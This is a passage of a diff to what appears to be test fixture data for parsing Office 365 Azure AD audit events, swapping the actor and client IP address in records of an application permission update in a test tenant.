false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -32,9 +32,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:33:26", "ExtendedProperties": [ { @@ -237,7 +237,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -267,9 +267,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:33:26", "ExtendedProperties": [ { @@ -472,7 +472,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f